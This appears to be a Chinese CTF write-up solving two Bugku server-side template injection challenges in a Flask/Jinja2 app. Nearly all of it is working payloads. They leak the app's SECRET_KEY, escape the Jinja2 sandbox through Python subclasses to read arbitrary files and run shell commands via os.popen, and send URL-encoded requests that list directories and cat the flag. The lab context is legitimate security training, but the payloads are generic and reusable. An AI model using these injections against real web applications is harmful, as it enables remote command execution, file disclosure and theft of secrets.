bugku之web

Simple_SSTI_1

首先payload如下，查看一下配置文件，发现什么都没有

1	/?flag{{config}}

根据提示先打开源码看一下，发现了这样的一句话

直接payload

1	/?flag={{config.SECRET_KEY}} ##这里的SECRET_KEY要大写

Simple_SSTI_2

根据题目以及提示可以看出本题是模板注入

先传参测试一下

发现可以执行，接着传入一些错误的语法句子查看一下具体的漏洞

发现是python的flask模板注入漏洞，并且python的版本是3.7，因此就可以查找到一些payload

文件读写

1	{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('在这里输文件名', 'r').read() }}{% endif %}{% endfor %}

命令执行

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('在这里输命令').read()") }}{% endif %}{% endfor %}

顺便看了一下python魔法函数

先直接ls /一下,读取一下系统文件

1
2

http://114.67.175.224:16281/?flag={%%20for%20c%20in%20[].__class__.__base__.__subclasses__()%20%}{%%20if%20c.__name__==%27catch_warnings%27%20%}{{%20c.__init__.__globals__[%27__builtins__%27].eval(%22__import__(%27os%27).popen(%27ls%20../%27).read()%22)%20}}{%%20endif%20%}{%%20endfor%20%}或者是
?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}}

发现了一些文件夹，然后再读取一下文件夹内的内容

在app文件里发现了flag

1
2

http://114.67.175.224:16281/?flag={%%20for%20c%20in%20[].__class__.__base__.__subclasses__()%20%}{%%20if%20c.__name__==%27catch_warnings%27%20%}{{%20c.__init__.__globals__[%27__builtins__%27].eval(%22__import__(%27os%27).popen(%27ls%20../app/%27).read()%22)%20}}{%%20endif%20%}{%%20endfor%20%}或者是
?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../app%27).read()%20}}

直接cat flag即可

1
2

http://114.67.175.224:16281/?flag={%%20for%20c%20in%20[].__class__.__base__.__subclasses__()%20%}{%%20if%20c.__name__==%27catch_warnings%27%20%}{{%20c.__init__.__globals__[%27__builtins__%27].eval(%22__import__(%27os%27).popen(%27cat%20../app/flag%27).read()%22)%20}}{%%20endif%20%}{%%20endfor%20%}或者是
?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../app/flag%27).read()%20}}